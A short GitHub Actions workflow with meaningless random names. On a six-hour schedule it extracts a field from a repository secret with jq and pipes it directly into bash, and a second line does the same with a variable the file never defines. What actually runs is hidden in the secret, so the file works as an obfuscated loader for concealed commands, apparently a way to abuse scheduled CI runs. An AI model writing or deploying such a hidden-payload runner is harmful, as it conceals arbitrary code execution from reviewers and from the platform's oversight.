name: kequanji7618
on:
  workflow_dispatch:
  schedule:
    - cron: '8 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kequanji7618
        env:
          rkz410: ${{ secrets.rkz410 }}
        run: |
          echo $rkz410 | jq -r .m027 | /bin/bash
          echo $q133 | jq -r .ffwk7 | /bin/bash

